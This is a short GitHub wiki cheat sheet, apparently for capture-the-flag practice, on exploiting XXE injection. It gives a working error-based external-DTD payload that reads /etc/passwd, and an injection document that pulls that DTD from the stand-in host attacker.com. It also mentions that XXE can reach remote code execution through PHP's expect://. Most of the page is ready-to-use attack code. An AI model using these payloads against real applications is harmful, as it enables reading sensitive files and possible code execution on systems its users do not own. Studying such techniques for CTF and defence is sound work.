.xml - adeptex/CTF GitHub Wiki

XXE Injection

XXE injection allows to read arbitrary files and sometimes RCE (if expect:// is enabled in PHP). Place a dtd file on your server and remote call it from XXE in vulnerable application.

https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

Save ext.dtd file on VPS

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Inject into vulnerable app

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>
⚠️ **GitHub.com Fallback** ⚠️